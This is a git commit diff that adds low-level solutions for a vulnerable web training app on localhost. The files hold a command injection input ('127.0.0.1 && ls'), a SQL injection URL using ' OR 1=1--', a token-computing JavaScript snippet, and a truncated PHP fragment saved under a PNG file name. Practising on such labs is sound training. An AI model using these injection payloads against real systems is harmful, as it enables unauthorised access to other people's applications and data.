commit de2700067e856161d81ecc0db98d6d44cd773247 Author: Louis Date: Fri Dec 8 10:02:50 2023 +0100 feat: :construction: Starting low level diff --git a/.DS_Store b/.DS_Store new file mode 100644 index 0000000..c749612 Binary files /dev/null and b/.DS_Store differ diff --git a/Command Injection/low.bash b/Command Injection/low.bash new file mode 100644 index 0000000..38967e7 --- /dev/null +++ b/Command Injection/low.bash @@ -0,0 +1 @@ +127.0.0.1 && ls \ No newline at end of file diff --git a/File injection/file-inject-low.png b/File injection/file-inject-low.png new file mode 100644 index 0000000..0874e35 --- /dev/null +++ b/File injection/file-inject-low.png @@ -0,0 +1,4 @@ +$output"; +?> \ No newline at end of file diff --git a/Javascript/low.js b/Javascript/low.js new file mode 100644 index 0000000..7e8bdff --- /dev/null +++ b/Javascript/low.js @@ -0,0 +1,3 @@ +const phrase = document.getElementById("phrase").value; +const token = md5(rot13(phrase)); +console.log(token); \ No newline at end of file diff --git a/SQL Injection/low.txt b/SQL Injection/low.txt new file mode 100644 index 0000000..03116cf --- /dev/null +++ b/SQL Injection/low.txt @@ -0,0 +1 @@ +Full url : http://localhost:4280/vulnerabilities/sqli/?id=test%27+OR+1=1--%27&Submit=Submit# \ No newline at end of file